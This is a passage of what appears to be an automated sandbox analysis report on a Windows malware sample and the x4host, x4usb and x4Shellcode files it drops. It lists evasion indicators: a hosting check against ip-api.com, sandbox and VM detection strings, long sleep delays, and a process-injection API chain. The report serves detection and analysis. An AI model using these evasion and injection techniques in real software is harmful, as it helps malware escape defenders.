                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\x4usb.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,FindCloseChangeNotification,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,FindCloseChangeNotification,CloseHandle,5_2_0000000140001868
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: x4host.exe, 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: x433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, x4host.exe.0.dr, x4usb.exe.2.drBinary or memory string: SBIEDLL.DLLCUSJ8UQGKRLJNAXNT6GA7PCHOZROFCGCGMCV8A058YIW0ANSSVE5NMBP6ECJ9C3ENP6LCC0XTD9NV4P7SATWGKGWWJELNDNAHWQXHACY0AU8TTKZQCF12VXLCJIRVTHCKGNAFSA5CGSAWHAT4K7J1VB1XD74A4TSL12K5XOHQWCJI4W892GJTBHNET83WZF0MCJXDIWABCIQC37A7I0UGRNSGGQQM7NQSUICKFAQPDZ07GCG2LARGGN4N1KWBHJS17GG8OHYIDD7YHJPCRVPH9BRUFE6NFMN75VIF57OYMQFBGLNYCCBWATT1ULITUI2D0YNXOOJSIMUSEE1FIR8CT9RQERHPOWMZELSR6COGPNCZ7FDR6FIPICQZQZYCNWRH85Q3YCY3JB8QDF4YUKFYY0VINFO
                      Source: C:\Users\user\Desktop\x433.exeMemory allocated: A90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeMemory allocated: 1A990000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeMemory allocated: 1B180000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\x4usb.exeMemory allocated: D60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\x4usb.exeMemory allocated: 1AA70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\x433.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\x4usb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeWindow / User API: threadDelayed 8461Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeWindow / User API: threadDelayed 1364Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4768Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3338Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 470Jump to behavior
                      Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 7592Jump to behavior
                      Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 2408Jump to behavior
                      Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9964Jump to behavior
                      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1173Jump to behavior
                      Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9855Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_5-8176
                      Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_5-8962
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_1-10221
                      Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_5-8179
                      Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-8119
                      Source: C:\Windows\System32\lsass.exeAPI coverage: 9.1 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.2 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.0 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.7 %
                      Source: C:\Users\user\Desktop\x433.exe TID: 6616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exe TID: 6620Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000Thread sleep count: 4768 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000Thread sleep count: 3338 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3444Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\dllhost.exe TID: 6992Thread sleep count: 470 > 30Jump to behavior
                      Source: C:\Windows\System32\dllhost.exe TID: 6992Thread sleep time: -47000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\dllhost.exe TID: 3152Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\winlogon.exe TID: 6524Thread sleep count: 7592 > 30Jump to behavior
                      Source: C:\Windows\System32\winlogon.exe TID: 6524Thread sleep time: -7592000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\winlogon.exe TID: 6524Thread sleep count: 2408 > 30Jump to behavior
                      Source: C:\Windows\System32\winlogon.exe TID: 6524Thread sleep time: -2408000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\lsass.exe TID: 6552Thread sleep count: 9964 > 30Jump to behavior
                      Source: C:\Windows\System32\lsass.exe TID: 6552Thread sleep time: -9964000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6764Thread sleep count: 1173 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6764Thread sleep time: -1173000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\dwm.exe TID: 6788Thread sleep count: 9855 > 30Jump to behavior
                      Source: C:\Windows\System32\dwm.exe TID: 6788Thread sleep time: -9855000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6808Thread sleep count: 250 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6808Thread sleep time: -250000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7076Thread sleep count: 252 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7076Thread sleep time: -252000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7116Thread sleep count: 253 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7116Thread sleep time: -253000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7092Thread sleep count: 249 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7092Thread sleep time: -249000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 3608Thread sleep count: 197 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 3608Thread sleep time: -197000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 1104Thread sleep count: 251 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 1104Thread sleep time: -251000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 5696Thread sleep count: 239 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 5696Thread sleep time: -239000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 2380Thread sleep count: 246 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 2380Thread sleep time: -246000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 2932Thread sleep count: 251 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 2932Thread sleep time: -251000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 5432Thread sleep count: 251 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 5432Thread sleep time: -251000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 1436Thread sleep count: 243 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 1436Thread sleep time: -243000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 1196Thread sleep count: 238 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 1196Thread sleep time: -238000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 1704Thread sleep count: 252 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 1704Thread sleep time: -252000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6908Thread sleep count: 251 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6908Thread sleep time: -251000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7052Thread sleep count: 253 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7052Thread sleep time: -253000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6672Thread sleep count: 250 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6672Thread sleep time: -250000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7088Thread sleep count: 242 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7088Thread sleep time: -242000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 2000Thread sleep count: 245 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 2000Thread sleep time: -245000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6964Thread sleep count: 248 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6964Thread sleep time: -248000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7048Thread sleep count: 238 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7048Thread sleep time: -238000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6976Thread sleep count: 250 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6976Thread sleep time: -250000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 4420Thread sleep count: 248 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 4420Thread sleep time: -248000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6320Thread sleep count: 251 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6320Thread sleep time: -251000s >= -30000s
                      Source: C:\Windows\System32\spoolsv.exe TID: 5288Thread sleep count: 188 > 30
                      Source: C:\Windows\System32\spoolsv.exe TID: 5288Thread sleep time: -188000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 2180Thread sleep count: 226 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 2180Thread sleep time: -226000s >= -30000s
                      Source: C:\Users\user\AppData\Local\x4usb.exe TID: 5840Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5716Thread sleep count: 227 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5716Thread sleep time: -227000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 1352Thread sleep count: 239 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 1352Thread sleep time: -239000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 4544Thread sleep count: 62 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 4544Thread sleep time: -62000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 1984Thread sleep count: 61 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 1984Thread sleep time: -61000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                      Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
                      Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\x4usb.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_000002D8B0A6E630 FindFirstFileExW,5_2_000002D8B0A6E630
                      Source: C:\Windows\System32\winlogon.exeCode function: 6_2_00000225DC64E630 FindFirstFileExW,6_2_00000225DC64E630
                      Source: C:\Windows\System32\lsass.exeCode function: 7_2_00000202C0AEE630 FindFirstFileExW,7_2_00000202C0AEE630
                      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000002A66130E630 FindFirstFileExW,8_2_000002A66130E630
                      Source: C:\Windows\System32\dwm.exeCode function: 9_2_000002BAAE26E630 FindFirstFileExW,9_2_000002BAAE26E630
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026A879CE630 FindFirstFileExW,10_2_0000026A879CE630
                      Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000179537AE630 FindFirstFileExW,11_2_00000179537AE630
                      Source: C:\Users\user\Desktop\x433.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\x4usb.exeThread delayed: delay time: 922337203685477
                      Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.drBinary or memory string: VMware SATA CD00
                      Source: svchost.exe, 0000000E.00000002.2961583336.000001845AC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                      Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.drBinary or memory string: NECVMWarVMware SATA CD00
                      Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                      Source: svchost.exe, 00000029.00000000.1906283750.0000023D1002B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1906340282.0000023D10043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2956233621.0000023D10043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2975747132.0000023D10900000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2954926787.0000023D1002B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000021.00000000.1866915131.000002644A702000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.16.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                      Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.16.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
